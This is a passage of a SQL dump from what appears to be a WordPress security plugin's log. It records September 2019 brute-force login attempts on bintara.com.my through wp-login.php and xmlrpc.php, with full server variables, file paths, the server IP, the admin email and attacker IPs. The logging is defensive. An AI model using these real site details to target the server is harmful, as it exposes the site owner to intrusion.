01:10:15',17739848,19230696,'https://bintara.com.my/wp-login.php',1,0,'178.128.212.173'),(23765,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"213.32.91.71\";s:11:\"REMOTE_PORT\";s:5:\"48610\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2M8wcaemJNJACwk0T1sAAAAQM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568509172.0922\";s:12:\"REQUEST_TIME\";s:10:\"1568509172\";}}','notice','2019-09-15 00:59:33','2019-09-15 00:59:32',18256488,19554248,'https://bintara.com.my/xmlrpc.php',1,0,'213.32.91.71'),(23764,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"213.32.91.71\";s:11:\"REMOTE_PORT\";s:5:\"48266\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2M8PPfj5xLH6d8s95Q9wAAAIQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568509169.0572\";s:12:\"REQUEST_TIME\";s:10:\"1568509169\";}}','notice','2019-09-15 00:59:30','2019-09-15 00:59:29',17741224,19232344,'https://bintara.com.my/wp-login.php',1,0,'213.32.91.71'),(23762,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"47.75.203.17\";s:11:\"REMOTE_PORT\";s:5:\"35146\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXzYenN0XMZvd-nnEMaAywAAAMQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568462970.2079\";s:12:\"REQUEST_TIME\";s:10:\"1568462970\";}}','notice','2019-09-14 12:09:31','2019-09-14 12:09:30',18254664,19553176,'https://bintara.com.my/xmlrpc.php',1,0,'47.75.203.17'),(23763,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-14 21:10:45','2019-09-14 21:10:41',17783896,18246368,'http://bintara.com.my/',1,0,'91.98.103.46'),(23761,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"47.75.203.17\";s:11:\"REMOTE_PORT\";s:5:\"34736\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXzYd@QQHIvaDiZQ28UDIAAAAFE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568462967.858\";s:12:\"REQUEST_TIME\";s:10:\"1568462967\";}}','notice','2019-09-14 12:09:29','2019-09-14 12:09:28',17739984,19231224,'https://bintara.com.my/wp-login.php',1,0,'47.75.203.17'),(24163,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"165.227.182.180\";s:11:\"REMOTE_PORT\";s:5:\"52060\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@hjh0uvyt9KRYoKL8hqAAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568645518.8923\";s:12:\"REQUEST_TIME\";s:10:\"1568645518\";}}','notice','2019-09-16 14:52:00','2019-09-16 14:51:59',18255808,19555064,'https://bintara.com.my/xmlrpc.php',1,0,'165.227.182.180'),(24162,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"165.227.182.180\";s:11:\"REMOTE_PORT\";s:5:\"51250\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@himf5CPZPc3WLyovKNAAAAMk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568645514.5196\";s:12:\"REQUEST_TIME\";s:10:\"1568645514\";}}','notice','2019-09-16 14:51:55','2019-09-16 14:51:54',17736200,19227240,'https://bintara.com.my/wp-login.php',1,0,'165.227.182.180'),(24161,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"213.32.91.71\";s:11:\"REMOTE_PORT\";s:5:\"56609\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@gBh0uvyt9KRYoKL8gdQAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568645126.6695\";s:12:\"REQUEST_TIME\";s:10:\"1568645126\";}}','notice','2019-09-16 14:45:28','2019-09-16 14:45:27',18255640,19555496,'https://bintara.com.my/xmlrpc.php',1,0,'213.32.91.71'),(24160,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"213.32.91.71\";s:11:\"REMOTE_PORT\";s:5:\"56428\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@gA2f5CPZPc3WLyovKFgAAANY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568645123.8536\";s:12:\"REQUEST_TIME\";s:10:\"1568645123\";}}','notice','2019-09-16 14:45:25','2019-09-16 14:45:24',17739904,19230728,'https://bintara.com.my/wp-login.php',1,0,'213.32.91.71'),(24159,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.221.116\";s:11:\"REMOTE_PORT\";s:5:\"33642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@duR0uvyt9KRYoKL8e2QAAABA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568644537.7574\";s:12:\"REQUEST_TIME\";s:10:\"1568644537\";}}','notice','2019-09-16 14:35:39','2019-09-16 